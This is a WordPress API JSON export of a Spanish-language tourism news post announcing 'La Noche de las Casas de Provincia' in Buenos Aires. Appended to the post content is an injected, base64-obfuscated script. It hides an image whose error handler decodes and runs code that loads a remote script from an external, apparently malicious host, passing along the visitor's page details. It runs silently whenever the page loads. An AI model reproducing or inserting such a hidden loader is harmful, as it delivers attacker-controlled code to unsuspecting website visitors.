{"id":9008,"date":"2024-12-03T09:34:47","date_gmt":"2024-12-03T12:34:47","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9008"},"modified":"2025-08-13T15:35:04","modified_gmt":"2025-08-13T18:35:04","slug":"se-celebra-una-nueva-edicion-de-la-noche-de-las-casas-de-provincia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9008","title":{"rendered":"Se celebra una nueva edici\u00f3n de \u201cLa Noche de las Casas de Provincia\u201d"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4f3f8aca4f22bf15d3f65c89c7ab6e8f\" style=\"background-color:#053c5c\"><em>El jueves 5 de diciembre, a partir de las 18, se llevar\u00e1 a cabo este evento federal que invita a recorrer la Argentina en la Ciudad de Buenos Aires.<\/em><\/h4>\n\n\n\n<p>Las representaciones oficiales de las provincias en la ciudad de Buenos Aires abrir\u00e1n sus puertas para celebrar la\u00a0<strong>11\u00aa edici\u00f3n de La Noche de las Casas de Provincia<\/strong>. En este evento federal el p\u00fablico podr\u00e1\u00a0<strong>conocer y disfrutar la diversidad y riqueza de propuestas culturales, tur\u00edsticas, gastron\u00f3micas y productivas que ofrece nuestro pa\u00eds<\/strong>.<\/p>\n\n\n\n<p>Cada casa de provincia presentar\u00e1 actividades que destacar\u00e1n su identidad cultural y productiva, incluyendo exhibiciones de sus principales destinos tur\u00edsticos y productos locales. Los vecinos de la Ciudad y turistas podr\u00e1n disfrutar de platos t\u00edpicos, comprar artesan\u00edas y participar en charlas que profundizan las tradiciones de cada provincia en los\u00a0<strong>3 circuitos<\/strong>\u00a0en los que se organiza la jornada:<\/p>\n\n\n\n<p><strong>Circuito 1: Santiago del Estero, Santa Cruz, Santa Fe, Corrientes, Neuqu\u00e9n, Tierra del Fuego, Tucum\u00e1n y R\u00edo Negro<\/strong>.<\/p>\n\n\n\n<p><strong>Circuito 2: Chubut, Entre R\u00edos, Jujuy, La Pampa, Misiones, Salta y San Juan<\/strong>.<\/p>\n\n\n\n<p><strong>Circuito 3: Buenos Aires, C\u00f3rdoba, Chaco, La Rioja y San Luis<\/strong>.<\/p>\n\n\n\n<p>La Noche de las Casas de Provincia es un&nbsp;<strong>evento gratuito y abierto a todo p\u00fablico<\/strong>, organizado por los&nbsp;<em>Gobiernos de las provincias participantes, miembros del Consejo Federal de Representaciones Oficiales (CONFEDRO) y cuenta con el respaldo del Consejo Federal de Inversiones (CFI), y el apoyo del Gobierno de la Ciudad de Buenos Aires. Acompa\u00f1an el Consejo Federal de Turismo (CFT) y la Secretar\u00eda de Turismo, Ambiente, y Deportes de la Naci\u00f3n<\/em>.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n sobre las actividades que se realizar\u00e1n en cada Casa de Provincia,\u00a0<strong>se puede ingresar en la cuenta de\u00a0<a href=\"https:\/\/www.instagram.com\/confedro\/?hl=es\">Instagram del Consejo Federal de Representaciones Oficiales (CONFEDRO)<\/a><\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/se-celebra-una-nueva-edicion-de-la-noche-de-las-casas-de-provincia\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:357px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El jueves 5 de diciembre, a partir de las 18, se llevar\u00e1 a cabo este evento federal que invita a recorrer la Argentina en la Ciudad de Buenos Aires. Las representaciones oficiales de las provincias en la ciudad de Buenos Aires abrir\u00e1n sus puertas para celebrar la\u00a011\u00aa edici\u00f3n de La Noche de las Casas de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9009,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9008","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9008"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9008\/revisions"}],"predecessor-version":[{"id":10028,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9008\/revisions\/10028"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9009"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9008"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}